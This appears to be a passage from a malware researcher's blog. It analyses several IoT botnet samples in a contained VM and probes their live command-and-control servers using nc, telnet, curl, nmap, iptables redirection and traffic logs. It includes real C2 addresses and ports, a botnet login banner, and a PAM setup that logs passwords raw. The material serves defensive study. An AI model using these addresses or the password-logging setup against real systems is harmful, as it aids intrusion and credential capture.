RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|', None)
With terminal color codes stripped, this results in:
(REMOTE BEACON)
ユーザー名:
パスワード:
チェックイン情報... |
Japanese. Unique language in malware to date for me. Lots of Chinese, Russian, even Portuguese, not much Japanese. Translated:
(REMOTE BEACON)
username:
password:
Check -in information ... |
Okay, that seems promising somehow. It just resets the connection afterwards though. This is progress, as I clearly got past the username and password.
I don't see much with regard to “check-in” information, so I'll see if the CONTAINED dropped traffic changes after it pings in. I also might need to have the server listen() for future connections on that same port, as this might just start as a port knock or something.
Back to contained malware:
(CONTAINED VM)
RECV DATA: (b'\x03\x00\x02\x01', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
RECV DATA: (b'\x00', None)
SEND DATA: b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[1;35m\xe3\x83\xa6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x82\xb6\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe5\x90\x8d\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\n\x1b[1;35m\xe3\x83\x91\x1b[1;37m\xe3\x82\xb9\x1b[1;35m\xe3\x83\xaf\x1b[1;37m\xe3\x83\xbc\x1b[1;35m\xe3\x83\x89\x1b[1;36m: \x1b[0m'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\n\r\n\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85xe5\xa0\xb1... \x1b[31m|\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m/'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m-'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m\\\r\x1b[37;1m\xe3\x83\x81\xe3\x82\xa7\xe3\x83\x83\xe3\x82\xaf\xe3\x82\xa4\xe3\x83\xb3\xe6\x83\x85\xe5\xa0\xb1... \x1b[31m|'
ConnectionError [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
RECV DATA: (b'\x00\x00', None)
SEND PING: b'\x00\x00'
So it seems like it just connects multiple times until it doesn't reset? I don't know how much of that is just the spam overloading the VM, or if I'm just supposed to callback immediately after with a b'\x00\x00' after getting a successful login. It's also somehow probably just spamming my own server code in a poor way and it's reacting wrong. I'll try that first, though.
Is this whole server just a callback for tallying purposes? I don't understand it just overly spams everything. Either that's intended to help prevent exactly what I'm doing, or the remote server is just going to take a tally of unique IPs that connect in. At some point I have to call it, but not yet. One last try. What if I block these RST packets they keep flying around in IPTables?
# iptables -t nat -A OUTPUT -d 46.19.137.50 -p tcp --dport 55566 --syn -m state --state NEW -m connlimit --connlimit-upto 1 -j DNAT --to-destination 127.0.0.1
# iptables -A OUTPUT -d 46.19.137.50 -p tcp --tcp-flags RST RST -j DROP
(CONTAINED VM)
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
SEND DATA: b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"'
ConnectionError: [Errno 104] Connection reset by peer
RECV DATA: (b'\x03\x00\x02\x01\x00', None)
Somehow that made it worse. Perhaps if I drop all packets going to port 23 and 2323 from within the VM to reduce network load? Or REJECT entirely? Timing issues?
# iptables -t nat -A OUTPUT -d 46.19.137.50 -j DNAT --to-destination 127.0.0.1
# iptables -t nat -A OUTPUT -d 46.19.137.50 -p tcp --dport 55566 --syn -m state --state NEW -m connlimit --connlimit-upto 1 -j DNAT --to-destination 127.0.0.1
# iptables -A OUTPUT -d 46.19.137.50 -p tcp --tcp-flags RST RST -j DROP
# iptables -A OUTPUT -p tcp --dport 23 -j DROP
# iptables -A OUTPUT -p tcp --dport 2323 -j DROP
Tried a few different combinations of the above options, but nothing worked. I decided to give up since the remote server is too inconsistent in its responses. It seems random how it responds, possibly due to it's own defenses, possibly because it's just a ruse.
TropicalV1 | <3 - 0x
inetnum: 194.31.98.0 - 194.31.98.255
netname: SERVER-194-31-98-0
country: NL
org: ORG-SB700-RIPE
admin-c: SBAH26-RIPE
tech-c: SBAH26-RIPE
status: ASSIGNED PA
mnt-by: PREFIXBROKER-MNT
created: 2022-02-28T08:21:25Z
last-modified: 2022-02-28T08:21:25Z
source: RIPE
organisation: ORG-SB700-RIPE
org-name: Serverion BV
org-type: OTHER
address: Krammer 8
address: 3232HE Brielle
address: Netherlands
abuse-c: SBAH26-RIPE
mnt-ref: PREFIXBROKER-MNT
mnt-by: PREFIXBROKER-MNT
created: 2022-02-28T08:21:25Z
last-modified: 2022-02-28T08:21:25Z
source: RIPE # Filtered
curl -i http://194.31.98.17/bins/
HTTP/1.1 200 OK
Date: Fri, 03 Jun 2022 06:25:09 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 02 Jun 2022 21:26:00 GMT
ETag: "4-5e07da6fb0f7e"
Accept-Ranges: bytes
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Hey
$ nc 194.31.98.17 1337
������"████████╗██████╗ ██████╗ ██████╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ██╗ ██╗
╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║██╔════╝██╔══██╗██║ ██║ ██║███║
██║ ██████╔╝██║ ██║██████╔╝██║██║ ███████║██║ ██║ ██║╚██║
██║ ██╔══██╗██║ ██║██╔═══╝ ██║██║ ██╔══██║██║ ╚██╗ ██╔╝ ██║
██║ ██║ ██║╚██████╔╝██║ ██║╚██████╗██║ ██║███████╗ ╚████╔╝ ██║
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═══╝ ╚═╝
TropicalV1 As cheap as $5
Total Users 4 - Total Attacks 167
╔══════════════════════════════════════════════════╗
║ Username : ║
╚══════════════════════════════════════════════════╝
╔══════════════════════════════════════════════════╗
║ Password : ║
╚══════════════════════════════════════════════════╝
Annnnnd here's where I had a unbrainfart. Between the initial command characters, and the raw terminal codes in the previous botnet login, I realized this is probably just the actual telnet protocol. Like RFC telnet. Doh. As someone who came out of the 90s with the mindset of never touching telnet again, the only use I had for telnet was the client for debugging raw socket sessions. While that works, it conditions oneself to think of telnet as a raw socket protocol which it is not fully. It's just the lightest protocol there could possibly be, and it works as a debugger that way quite nicely sometimes.
So, let's just try telnet.
$ telnet 194.31.98.17 1337
Trying 194.31.98.17...
Connected to 194.31.98.17.
Escape character is '^]'.
████████╗██████╗ ██████╗ ██████╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ██╗ ██╗
╚══██╔══╝██╔══██╗██╔═══██╗██╔══██╗██║██╔════╝██╔══██╗██║ ██║ ██║███║
██║ ██████╔╝██║ ██║██████╔╝██║██║ ███████║██║ ██║ ██║╚██║
██║ ██╔══██╗██║ ██║██╔═══╝ ██║██║ ██╔══██║██║ ╚██╗ ██╔╝ ██║
██║ ██║ ██║╚██████╔╝██║ ██║╚██████╗██║ ██║███████╗ ╚████╔╝ ██║
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═══╝ ╚═╝
TropicalV1 As cheap as $5
Total Users 4 - Total Attacks 167
╔══════════════════════════════════════════════════╗
║ Username : ║
╚══════════════════════════════════════════════════╝
Yeah, just telnet. Even has control codes for “Username” working for expanding the menu to “Password” when it goes on which I wasn't getting with raw sockets. All because the raw terminal codes were being ignored. That should not have taken that long for me to realize.
Have to sideload some packages from an internet connected VM (just apt download):
# dpkg -i openbsd-inetd_0.20160825-5_amd64.deb
# dpkg -i tcpd_7.6.q-31_amd64.deb
# dpkg -i telnet_0.17-44_amd64.deb
# dpkg -i telnetd_0.17-44_amd64.deb
For logging passwords raw, apparently at least I can't find any really well documented way to do this officially. There is this article and this PAM module that seem to work for me:
https://www.adeptus-mechanicus.com/codex/logsshp/logsshp.html
https://silicon-verl.de/home/flo/software/pamcifs.html
After editing, compiling, loading into PAM, configuring, etc…
My login attempt via telnet from the contained VM:
(CONTAINED VM)
$ telnet 194.31.98.17 1337
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Kali GNU/Linux Rolling
kali login: johhny
Password:
(CONTAINED VM)
Jun 04 05:06:29 kali pam_storepw[166292]: writing to /var/log/passwords
(CONTAINED VM)
host = localhost : username = johhny : password = asd
After infection, nothing. Completely blank. It's not making a full connection still. It's either expecting certain output from the server, or expecting certain headers or telnet options. Baud rate, possibly? Possibly a modified telnet server to output a certain set of byte(s) in the header like previously noticed?
(CONTAINED VM)
Jun 04 05:12:12 kali in.telnetd[168378]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168378]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168383]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168383]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168384]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168384]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168385]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168385]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168386]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:13 kali telnetd[168386]: ttloop: read: Connection reset by peer
Jun 04 05:12:13 kali in.telnetd[168387]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168387]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168392]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168392]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168393]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168393]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168394]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:14 kali telnetd[168394]: ttloop: read: Connection reset by peer
Jun 04 05:12:14 kali in.telnetd[168395]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168395]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168400]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168400]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168401]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168401]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168402]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:15 kali telnetd[168402]: ttloop: read: Connection reset by peer
Jun 04 05:12:15 kali in.telnetd[168403]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168403]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168408]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168408]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168409]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168409]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168410]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168410]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168411]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168411]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168412]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168412]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168413]: connect from 192.168.XX.YY (192.168.XX.YY)
Jun 04 05:12:16 kali telnetd[168413]: ttloop: read: Connection reset by peer
Jun 04 05:12:16 kali in.telnetd[168414]: connect from 192.168.XX.YY (192.168.XX.YY)
So, this malware is even spamming a standard telnet server. Either it's expecting specific output from the server, or it's expecting these weird headers/tags. It could just be posing as a telnet server and the magic headers are how you really get in. TCP flag manipulation is also a possibility.
Haven't tried listening with Netcat for this to see if I can grab some header just to compare with the miori header. Let's try it.
# iptables -t nat -A OUTPUT -d 194.31.98.17 -j DNAT --to-destination 127.0.0.1
# nc -l -p 1337 -o hexout.txt
invalid connection to [127.0.0.1] from (UNKNOWN) [192.168.XX.YY] 55162
Very simple one this time:
(REMOTE BEACON)
$ nc 2.56.59.196 7777
������"Username:
Password:
Invalid Credentials. Connection Logged!
(REMOTE BEACON)
$ telnet 2.56.59.196 7777
Username:Connection closed by foreign host.
Back to jiggling the lock…
(REMOTE BEACON)
SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND DATA: b'\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"Username:', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h\xff\xfb\x01\xff\xfb\x03\xff\xfc"', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'\x1b[?1049h', None)
Odd response, just resets the login process. I do find it interesting that it has the same set of header responses here as miori, though. Time to contain Saitama121 like the others and see if I can suss anything out of that binary's network streams.
The excess IPs are abundant, so let's map them because why not. Maybe they are targeted DDoS extras, maybe it's randomly generated.
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_miori.txt | gzip > contained_miori.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_saitama121.txt | gzip > contained_saitama121.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_tropicalv1.txt | gzip > contained_tropicalv1.csv.gz
# sed -r "s/^.* DST=([0-9\.]+) .* DPT=([0-9]+) .*$/\1,\2/g" < redacted/logs/contained_wgetflood.txt | gzip > contained_wgetflood.csv.gz
$ wc -l redacted/logs/contained_{miori,saitama121,tropicalv1,wgetflood}.txt
1014986 redacted/logs/contained_miori.txt
1126091 redacted/logs/contained_saitama121.txt
292877 redacted/logs/contained_tropicalv1.txt
101120 redacted/logs/contained_wgetflood.txt
2535074 total
Not a walk in the park. This could take multiple days to geolocate. Will likely have to take a random sample of the IPs generated since they go on seemingly forever.
(REMOTE BEACON)
$ nc 45.95.55.27 32774
Ncat: Broken pipe.
(REMOTE BEACON)
$ telnet 45.95.55.27 32774
Trying 45.95.55.27...
Connected to 45.95.55.27.
Escape character is '^]'.
Connection closed by foreign host.
(REMOTE BEACON)
$ nmap -p 32774 45.95.55.27
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-05 14:31 CDT
Nmap scan report for 45.95.55.27.fly-hosting.net (45.95.55.27)
Host is up (0.12s latency).
PORT STATE SERVICE
32774/tcp open sometimes-rpc11
Nmap done: 1 IP address (1 host up) scanned in 0.77 seconds
(REMOTE BEACON)
SEND DATA: b'\x03\x00\x02\x01\x00'
RESPONSE: (b'', None)
SEND DATA: b'\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
RESPONSE: (b'', None)
SEND PING: b'\x00\x00'
Seems very different. Just not responding at all.
chaff_miori_csv <- read.csv("contained_miori.csv.gz")
chaff_saitama121_csv <- read.csv("contained_saitama121.csv.gz")
chaff_tropicalv1_csv <- read.csv("contained_tropicalv1.csv.gz")
chaff_wgetflood_csv <- read.csv("contained_wgetflood.csv.gz")
chaff_uwu_csv <- read.csv("contained_uwu.csv.gz")
chaff_miori <- unique(chaff_miori_csv)
chaff_saitama121 <- unique(chaff_saitama121_csv)
chaff_tropicalv1 <- unique(chaff_tropicalv1_csv)
chaff_wgetflood <- unique(chaff_wgetflood_csv)
chaff_uwu <- unique(chaff_uwu_csv)
EDIT: Trial and error has shown this to be roughly an 8 hour process sequentially per 5000 IPs.
set.seed(912903)
SAMPLE_SIZE <- 5000
chaff_miori <- chaff_miori[
sample(rownames(chaff_miori), SAMPLE_SIZE),
]
chaff_saitama121 <- chaff_saitama121[
sample(rownames(chaff_saitama121), SAMPLE_SIZE),
]
chaff_tropicalv1 <- chaff_tropicalv1[
sample(rownames(chaff_tropicalv1), SAMPLE_SIZE),
]
chaff_wgetflood <- chaff_wgetflood[
sample(rownames(chaff_wgetflood), SAMPLE_SIZE),
]
chaff_uwu <- chaff_uwu[
sample(rownames(chaff_uwu), SAMPLE_SIZE),
]
if(!file.exists("chaff_miori_geo.csv.gz")){
head(unique(chaff_miori))
chaff_miori_geo <- geoiporg_df(chaff_miori, "IP.Address")
write.csv(chaff_miori_geo,
gzfile("chaff_miori_geo.csv.gz"), row.names=FALSE
)
} else {
chaff_miori_geo <- read.csv("chaff_miori_geo.csv.gz")
}
if(!file.exists("chaff_saitama121_geo.csv.gz")){
head(unique(chaff_saitama121))
chaff_saitama121_geo <- geoiporg_df(chaff_saitama121, "IP.Address")
write.csv(chaff_saitama121_geo,
gzfile("chaff_saitama121_geo.csv.gz"), row.names=FALSE
)
} else {
chaff_saitama121_geo <- read.csv("chaff_saitama121_geo.csv.gz")
}
if(!file.exists("chaff_tropicalv1_geo.csv.gz")){
chaff_tropicalv1_geo <- geoiporg_df(chaff_tropicalv1, "IP.Address")
write.csv(chaff_tropicalv1_geo,
gzfile("chaff_tropicalv1_geo.csv.gz"), row.names=FALSE
)
} else {
chaff_tropicalv1_geo <- read.csv("chaff_tropicalv1_geo.csv.gz")
}
if(!file.exists("chaff_wgetflood_geo.csv.gz")){
